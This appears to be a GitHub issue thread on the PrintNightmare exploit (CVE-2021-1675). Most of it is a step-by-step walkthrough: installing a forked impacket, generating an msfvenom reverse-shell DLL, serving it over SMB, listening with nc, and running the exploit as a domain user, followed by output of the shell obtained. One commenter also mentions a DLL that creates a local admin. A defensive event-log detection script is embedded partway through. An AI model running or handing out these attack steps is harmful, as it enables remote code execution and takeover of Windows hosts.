Open useragent23253 opened 1 year ago
it will solve for you if you use the domain user account not the admin
Hello,
The exploit will not work if you use a privileged user; the user must be a simple domain user.
Steps from a kali machine :
1- remove preinstalled impacket package
# apt remove --purge python3-impacket
or
# pip3 uninstall impacket
2- install the impacket package from cube0x0 repo
# git clone https://github.com/cube0x0/impacket
# cd impacket
# python3 ./setup.py install
3- create a dll payload
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.117.200 LPORT=9090 -f dll -o print64.dll
4- put the payload in a shared folder and run smbserver.py or the smbd service
# cp print64.dll /share/
# smbserver.py share /share -smb2support
/usr/local/bin/smbserver.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'smbserver.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
5- run nc for listening
# nc -lvp 9090
listening on [any] 9090 ...
6- run the exploit as a simple domain user; it will generate some errors but it will work
# python3 CVE-2021-1675.py mylab.local/user:'user@koko123'@192.168.117.10 '\\192.168.117.200\share\print64.dll'
[*] Connecting to ncacn_np:192.168.117.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3d8f0626c408afea\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.80.41\share\print64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smbconnection.py", line 568, in writeFile
return self._SMBConnection.writeFile(treeId, fileId, data, offset)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smb3.py", line 1650, in writeFile
written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
7- here is my shell :D
nc -lvp 9090
listening on [any] 9090 ...
connect to [192.168.117.200] from SRV-EX01.mylab.local [192.168.117.10] 52823
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
hostname
SRV01
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::4980:feb4:6fae:992d%6
IPv4 Address. . . . . . . . . . . : 192.168.117.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.117.254
Tunnel adapter isatap.{EC174390-CEE5-4891-85B5-536D188BC65E}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>
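For the defending side, the sequence above leaves two traces in the spooler's own event log (a driver file sourced from a UNC share, and the spooler loading the displaced driver from the old\ backup directory), and the Point and Print policy key controls whether a plain domain user may install drivers at all. The block below is an added example, not code from this issue or the exploit repository; the event wording is constructed and an assumption loosely modeled on PrintService/Operational entries, and the registry values are passed in as a dict rather than read from a live host:

```python
import re
from dataclasses import dataclass

# Constructed sample events, loosely modeled on Microsoft-Windows-PrintService/
# Operational entries (IDs 316 and 808); the exact wording is an assumption,
# not output taken from this issue. The UNC path mirrors the share used above.
SAMPLE_EVENTS = [
    (316, r"Printer driver 1234 for Windows x64 Version-3 was added or updated. "
          r"Files:- UNIDRV.DLL, kernelbase.dll, \\192.168.117.200\share\print64.dll. "
          r"No user action is required."),
    (808, r"The print spooler failed to load a plug-in module "
          r"C:\Windows\system32\spool\DRIVERS\x64\3\old\1\print64.dll, error code 0x45A."),
    (316, r"Printer driver Microsoft XPS Document Writer v4 for Windows x64 Version-4 "
          r"was added or updated. Files:- mxdwdrv.dll, PrintConfig.dll."),
]

# Driver file referenced by a UNC path: \\host\share\file or \??\UNC\host\share\file
UNC_RE = re.compile(r"(?:\\\?\?\\UNC\\|\\\\)[\w.\-]+\\[^\\\s,]+\\[^\s,]+", re.I)
# The spooler parks the overwritten driver under ...\3\old\<n>\ before loading it
OLD_DIR_RE = re.compile(r"\\spool\\DRIVERS\\x64\\3\\old\\\d+\\", re.I)

@dataclass
class Finding:
    event_id: int
    reason: str
    path: str

def analyze(events):
    """Return findings for (event_id, message) pairs that match the patterns above."""
    findings = []
    for eid, msg in events:
        if eid == 316:
            for m in UNC_RE.finditer(msg):
                findings.append(Finding(eid, "driver file sourced from a UNC share",
                                        m.group(0).rstrip(".")))
        elif eid == 808 and OLD_DIR_RE.search(msg):
            path = msg.split("module ", 1)[1].split(",")[0]
            findings.append(Finding(eid, "plug-in loaded from drivers\\x64\\3\\old", path))
    return findings

# Point and Print policy values under HKLM\Software\Policies\Microsoft\Windows NT\
# Printers\PointAndPrint; `values` is a dict read from that key (constructed here).
def point_and_print_hardened(values):
    # A missing value is treated as unverified rather than assumed safe.
    return (values.get("RestrictDriverInstallationToAdministrators", 0) == 1
            and values.get("NoWarningNoElevationOnInstall", 0) == 0
            and values.get("UpdatePromptSettings", 0) == 0)
```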
it works fine with impacket 0.11.0 too
I was testing with a custom DLL that creates a local admin user and with msfvenom shellcode. Neither sample is working. Any suggestions?
c:\Users\user1\Downloads>SharpPrintNightmare.exe 'c:\programdata\5001.dll'
[*] pDriverPath C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\mxdwdrv.dll
[*] Executing 'c:\programdata\5001.dll'
[*] Try 1...
[*] Stage 0: 87
[*] Try 2...
[*] Stage 0: 87
[*] Try 3...
[*] Stage 0: 87